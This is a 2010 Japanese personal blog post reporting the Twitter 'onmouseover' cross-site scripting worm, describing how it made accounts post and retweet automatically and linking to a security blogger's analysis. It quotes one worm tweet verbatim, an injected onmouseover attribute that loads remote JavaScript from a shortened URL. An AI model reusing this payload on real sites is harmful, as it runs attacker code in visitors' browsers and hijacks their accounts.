--.--
--
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

このエントリーをはてなブックマークに追加
09.21
Tue
Twitter hack1 20100921

Twitter hack1 20100921_3  Twitter hack1 20100921_2  


先程2010年9月21日20時頃より、Twitter.comがハッキングされているのを確認しました。
普通にアクセスしたところなんだが様子がおかしい・・・
ハックの文字が頭に浮かびつつもブラウザがバグったのかと思い
再起動かけて再度接続したところ同じ状況だったのでおかしいと確信。

画像のように赤ピンク色の文字のようなものが画面いっぱいにひろがっていました。
英語にも見えなく何が書いてあるのかは不明。
スクロールバーもかなり伸びていてずっと下の方までピンク色の文字が続いていました。


XSSの脆弱性を突かれたようでWEBのTwitterにアクセスすると
仕掛けられたJavaScriptにより勝手にツイートやRTを行ってしまう事が発生しています。
俺もRTや意味不明なツイートをしています。記念に残しておきます。
http://t.co/@%22style=%22font-size:999999999999px;%22onmouseover=%22$.getScript%28%27http:%5Cu002f%5Cu002fis.gd%5Cu002ffl9A7%27%29%22/

現在自分のページは復旧しているっぽいですが、全体的に復旧したのかは不明です。
Twitterクライアント使用者は問題ないようでしたので、今後はWEBからの接続は控えて
専用クライアントからのほうが良いかもしれません。
有名な人もかなり利用してるので気をつけてもらいたいですな。

ハックというよりは脆弱性バグを利用してJavaScriptを実行させ
それをRTやツイートさせていきネズミ講のように広める超悪質なイタズラみたいなものみたいです。
onmouseoverと書いてるように意味不明な文字にマウスカーソルをのせると実行させられてしまうのでしょう。

Twitter.comが改竄されハッキング・クラッキングされた模様
以前ハックされたとき書いた記事は2009年12月18日でした。
セキュリティーを向上させるとか言ってた気がしたが・・・またまたハックされたTwitterであった。

Twitter ‘onmouseover’ security flaw widely exploited | Graham Cluley's blog
セキュリティー専門家がさっそく動画検証を行っているようです。

さっき見つけたけど、一部のユーザーにテスト中の新Twitter UIも格好良く使いやすそうだな。
http://www.youtube.com/watch?v=rIpD7hfffQo このエントリーをはてなブックマークに追加
comment 0 trackback 0
トラックバックURL
http://oreryucustomize.blog93.fc2.com/tb.php/184-d0181cb4
トラックバック
コメント
管理者にだけ表示を許可する
 
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。